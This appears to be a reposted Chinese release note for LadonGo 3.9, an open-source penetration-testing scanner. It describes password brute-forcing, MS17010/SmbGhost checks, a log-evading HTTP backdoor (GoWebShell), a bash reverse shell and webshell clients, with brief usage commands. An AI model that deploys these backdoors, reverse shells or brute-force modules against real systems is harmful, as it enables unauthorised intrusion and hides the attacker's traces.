简介
LadonGo一款开源跨平台内网渗透扫描器框架,使用它可轻松一键探测C段、B段、A段存活主机、指纹识别、端口扫描、密码爆破、远程执行、高危漏洞检测等。3.9版本包含36个功能,高危漏洞检测MS17010、SmbGhost,远程执行SshCmd、WinrmCmd、PhpShell、GoWebShell、LnxRevShell、JspShell,12种协议密码审计Smb/Ssh/Ftp/Mysql/Mssql/Oracle/Sqlplus/Winrm/HttpBasic/Redis/MongoDB/RouterOS,存活探测/信息收集/指纹识别NbtInfo、OnlinePC、Ping、Icmp、SnmpScan,HttpBanner、HttpTitle、TcpBanner、WeblogicScan、OxidScan,端口扫描/服务探测PortScan。
Bin
已编译Windows、Linux、Mac、Arm通用版,其它内核自行编译
3.9 20220422 更新功能
[+]GoWebShell 目标无需存在WEB,HTTP正向后门
[+]LnxRevShell Linux Bash反弹shell TCP反向
[+]WinJspShell 连接菜刀JSP执行Windows命令
[+]LnxJspShell 连接菜刀JSP执行Linux命令
GoWebShell
用法:
Ladon GoWebShell
Ladon GoWebShell IP Port
使用以上命令,无论目标是否存在网站,均可开启WebShell正向后门,由于不通过IIS、Apache、Tomcat、Nginx等中间件,不会被这些应用记录日志。只要我们不访问就不会产生任何流量,通信是明文,大家自己改。
浏览器 访问 http://192.10.22.105:8888/web 执行命令 以Linux为例子
不指定IP端口,默认监听888端口,以Windows为例子
Linux反弹Shell
用法: ./Ladon LnxRevShell IP 端口
这个没什么特别,只是单纯的BASH命令反弹,并非GO反弹
JspShell
前几天遇到代理后无法访问内网WebShell的情况,非常卡执行10多次whoami都未必成功一次,全是超时。于是给LadonGO添加菜刀连接JSP执行命令的功能,分别为WinJspShell、LnxJspShell,请针对目标环境使用对应模块。因目标环境仅支持菜刀的WebShell,所以该模块只能连菜刀的JspShell,正常情况下我们代理就可以使用了,如果你正常操作一切顺利,可能用不到这功能,希望大家永远遇不到这种奇葩环境。
相关文章
LadonGo 3.8 for Linux arm 路由器横向渗透内网
Wiki http://k8gege.org/Ladon/LadonGo.html
原文始发于微信公众号(K8实验室):LadonGo无WEB正向后门
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论